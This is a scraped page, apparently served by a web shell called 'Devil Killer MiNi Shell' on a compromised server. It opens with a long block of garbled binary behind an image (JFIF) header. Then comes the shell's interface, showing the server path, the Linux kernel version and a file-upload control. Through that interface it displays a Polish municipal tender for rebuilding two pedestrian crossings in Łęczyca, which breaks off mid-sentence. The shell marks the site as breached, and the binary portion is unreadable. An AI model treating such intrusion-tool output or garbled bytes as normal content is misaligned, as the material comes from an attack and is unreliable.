JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211122/0027782301-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa przejścia dla pieszych w Łęczycy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO ŁĘCZYCA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 610018479</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">M. Konopnickiej 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łęczyca</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">99-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL715 - Skierniewicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">okubas@leczyca.info.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.leczyca.info.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa przejścia dla pieszych w Łęczycy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-79bbcbe7-4b75-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00277823</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004469/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Przebudowa przejścia dla pieszych przy ul. Zachodniej w Łęczycy oraz Przebudowa przejścia dla pieszych przy ul. Kilińskiego w Łęczycy przy ul. Kilińskiego w Łęczycy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/um_leczyca <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/um_leczyca</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wniosków o<br/>dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie<br/>dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków<br/>określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki<br/>komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia<br/>18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344).<br/>2. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 Pzp, podmiotowe środki dowodowe,<br/>pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci<br/>elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf,<br/>.doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w SWZ składa się, pod rygorem<br/>nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym.<br/>3. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują elektronicznie za<br/>pomocą platformazakupowa.pl (dalej jako „Platforma”), dostępną pod adresem:<br/>https://platformazakupowa.pl/pn/um_leczyca i formularza „Wyślij wiadomość do zamawiającego”<br/>dostępnego na stronie dotyczącej danego postepowania (nie dotyczy składania ofert).<br/>4. W sytuacjach awaryjnych np. w przypadku niedziałania Platformy, Zamawiający dopuszcza<br/>komunikację za pomocą poczty elektronicznej na adres: okubas@leczyca.info.pl (nie dotyczy składania<br/>ofert).<br/>5. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z Platformy, określone w Regulaminie zamieszczonym na stronie<br/>internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący.<br/>2) zapoznał i stosuje się do Instrukcji składania ofert dostępnej pod adresem:<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view<br/>6. Zamawiający, zgodnie z § 11 ust. 3 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020<br/>r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzieleniezamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na Platformie, tj.:<br/>1) stały dostęp do sieci Internet,<br/>2) komputer klasy PC lub MAC,<br/>3) zainstalowana dowolna przeglądarka internetowa, np. Google Chrome, FireFox lub Internet<br/>Explorer,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader, lub inny obsługujący format plików .pdf,<br/>6) Platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>7. Zamawiający zamieści na stronie internetowej https://platformazakupowa.pl/pn/um_leczyca<br/>dokumenty określone w przepisach ustawy Pzp.<br/>8.Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za<br/>pośrednictwem Platformy. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany<br/>terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji<br/>„Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny<br/>Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem Platformy do<br/>konkretnego Wykonawcy.<br/>9.Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości<br/>bezpośrednio na Platformie przesłanych przez Zamawiającego, gdyż system powiadomień może ulec<br/>awarii lub powiadomienie może trafić do folderu SPAM. Szczegółowo określono w pkt 16 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. administratorem Pani/Pana danych osobowych jest Miasto Łęczyca, ul. M. Konopnickiej 14, 99-100<br/>Łęczyca<br/>2. kontakt z inspektorem ochrony danych osobowych: iodo@leczyca.info.pl;<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. cRODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego nr 271.2.4.2021;<br/>4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 3 ustawy z dnia 11 września 2019 r. –<br/>Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm.) dalej „ustawa Pzp”;<br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6. dokumentacja z postępowania o udzielenie zamówień publicznych na zadania realizowane z<br/>dofinasowaniem ze środków Unii Europejskiej - przez okres wymagany przez Instytucję Zarządzającą<br/>danym programem operacyjnym skąd pozyskano środki.<br/>7. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;8. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>9. posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>10. nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>11. Zgodnie z art. 222 ust. 5 PZP dane wykonawców uczestniczących w postępowaniu przetargowym<br/>są udostępniane na stronie https://platformazakupowa.pl/pn/um_leczyca, tak jak ogłoszenie o<br/>wykonaniu umowy na podstawie art. 448 PZP.<br/>12. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 PZP, a także podmioty upoważnione<br/>na podstawie i w granicach prawa oraz podmiotom, z którym Administrator Danych Osobowych zawarł<br/>umowę powierzenia przetwarzanie danych oraz odbiorcy danych w rozumieniu przepisów o ochronie<br/>danych osobowym, m.in. Urząd Miasta Łęczyca, podmioty świadczące usługi pocztowe, kurierskie,<br/>usługi informatyczne.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">272.2.6.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 zamówienia – Przebudowa przejścia dla pieszych przy ul. Zachodniej w Łęczycy<br/>Zakres robót obejmuje wykonanie dwóch przejść dla pieszych:<br/>przy ul. Zachodniej w Łęczycy:<br/>- wykonanie robót rozbiórkowych niezbędnych dla prawidłowego wykonania zadania,<br/>przebudowę fragmentu chodnika, wymianę krawężników i obrzeży, wykonanie nawierzchnijezdni w miejscu przejścia dla pieszych w kolorze biało - czerwonym, montaż punktowych<br/>solarnych elementów odblaskowych, wykonanie nawierzchni o zwiększonej szorstkości,<br/>wykonanie linii wibracyjnych, montaż systemu informacji fakturowej, montaż barier<br/>chodnikowych, wykonanie dedykowanego solarnego oświetlenia dla przejścia dla pieszych,<br/>wykonanie oznakowania pionowego wykonanego przejścia dla pieszych.<br/>Zamawiający opisał przedmiot zamówienia za pomocą: Programu Funkcjonalno Użytkowego i<br/>załącznika graficznego ze szkicem koncepcyjnym, zawartych w Opisie przedmiotu zamówienia<br/>(OPZ) stanowiącym załącznik nr 3 do niniejszej SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233221-4 - Malowanie nawierzchi</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">C - cena - 60% C = (Cena minimalna / Cena badanej oferty) x 60 pkt <br/>G – gwarancja i rękojmia - 40% Zaproponowany okres gwarancji jakości i rękojmi na wykonany przedmiot umowy – 5 lat (60 miesięcy) – 0 pkt <br/>Zaproponowany okres gwarancji jakości i rękojmi na wykonany przedmiot umowy – 5,5 roku (66 miesięcy) – 20 pkt <br/>Zaproponowany okres gwarancji jakości i rękojmi na wykonany przedmiot umowy – 6 lat (72 miesiące) – 40 pkt <br/> <br/>Oferty zawierające okres gwarancji krótszy niż 60 miesięcy zostaną odrzucone jako nie spełniające wymagań SWZ. <br/>Za niewskazanie w formularzu oferty okresu gwarancji, wykreślenie wszystkich wskazanych okresów gwarancji lub wykreślenie tylko jednego wskazanego okresu oferta nie otrzyma dodatkowych punków w tym kryterium oceny ofert. W takim przypadku Zamawiający przyjmuje, że Wykonawca zaproponował najkrótszy okres gwarancji tj. okres 60 miesięcy. <br/>Za ofertę najkorzystniejszą zostanie uznana oferta, która spełnia wszystkie wymagania określone w SWZ oraz otrzyma największą liczbę punktów. <br/>Zamawiający przyjmuje, że: 1 pkt = 1 % <br/> <br/>P = C + G <br/> <br/>gdzie: <br/>P – łączna ilość punktów badanej oferty <br/>C – ilość punktów badanej oferty w kryterium cena <br/>G – ilość punktów badanej oferty w kryterium gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 zamówienia – Przebudowa przejścia dla pieszych przy ul. Kilińskiego w Łęczycy przy ul.<br/>Kilińskiego w Łęczycy:<br/>wykonanie robót rozbiórkowych niezbędnych dla prawidłowego wykonania zadania, wykonanie<br/>nawierzchni jezdni w miejscu przejścia dla pieszych w kolorze biało - czerwonym, montaż<br/>punktowych solarnych elementów odblaskowych, wykonanie nawierzchni o zwiększonej<br/>szorstkości, wykonanie linii wibracyjnych, montaż systemu informacji fakturowej, montaż barier<br/>chodnikowych, wykonanie dedykowanego solarnego oświetlenia dla przejścia dla pieszych,<br/>wykonanie oznakowania pionowego wykonanego przejścia dla pieszych<br/>Zamawiający opisał przedmiot zamówienia za pomocą: Programu Funkcjonalno Użytkowego i<br/>załącznika graficznego ze szkicem koncepcyjnym, zawartych w Opisie przedmiotu zamówienia<br/>(OPZ) stanowiącym załącznik nr 3A do niniejszej SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233221-4 - Malowanie nawierzchi</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">C - cena - 60% C = (Cena minimalna / Cena badanej oferty) x 60 pkt <br/>G – gwarancja i rękojmia - 40% Zaproponowany okres gwarancji jakości i rękojmi na wykonany przedmiot umowy – 5 lat (60 miesięcy) – 0 pkt <br/>Zaproponowany okres gwarancji jakości i rękojmi na wykonany przedmiot umowy – 5,5 roku (66 miesięcy) – 20 pkt <br/>Zaproponowany okres gwarancji jakości i rękojmi na wykonany przedmiot umowy – 6 lat (72 miesiące) – 40 pkt <br/> <br/>Oferty zawierające okres gwarancji krótszy niż 60 miesięcy zostaną odrzucone jako nie spełniające wymagań SWZ. <br/>Za niewskazanie w formularzu oferty okresu gwarancji, wykreślenie wszystkich wskazanych okresów gwarancji lub wykreślenie tylko jednego wskazanego okresu oferta nie otrzyma dodatkowych punków w tym kryterium oceny ofert. W takim przypadku Zamawiający przyjmuje, że Wykonawca zaproponował najkrótszy okres gwarancji tj. okres 60 miesięcy. <br/>Za ofertę najkorzystniejszą zostanie uznana oferta, która spełnia wszystkie wymagania określone w 